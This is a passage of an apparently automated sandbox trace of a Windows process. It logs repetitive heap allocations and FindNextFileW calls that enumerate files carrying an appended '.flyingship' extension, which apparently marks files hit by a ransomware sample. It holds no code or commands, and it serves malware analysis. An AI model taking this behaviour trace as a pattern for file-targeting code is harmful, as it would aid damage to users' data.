dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.165] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.166] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.228] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.228] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.229] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca06d940, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xca06d940, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xca093aa0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xb2d0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="5c0eXZdnCGl.flyingship.mp3", cAlternateFileName="5C0EXZ~2.MP3")) returned 1 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db330 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db330 | out: hHeap=0x8a0000) returned 1 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.229] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.229] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.230] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.230] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.231] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca12c020, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xca12c020, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xca19e440, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xe820, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="6EgOrexJkDL7op.flyingship.mp3", cAlternateFileName="6EGORE~2.MP3")) returned 1 [0157.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db330 [0157.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db330 | out: hHeap=0x8a0000) returned 1 [0157.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.231] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.231] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.232] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.232] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.233] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.233] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca282c80, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xca282c80, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xca2cef40, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x13ef0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="6F5BQoLL3Uym0CamPlpJ.flyingship.jpg", cAlternateFileName="6F5BQO~2.JPG")) returned 1 [0157.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.233] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.234] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.234] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8e2a80 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.235] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.235] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.236] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca38d620, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xca38d620, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xca3d98e0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x110b0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="6iBbdX1qsRyDlZ.flyingship.swf", cAlternateFileName="6IBBDX~2.SWF")) returned 1 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db330 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 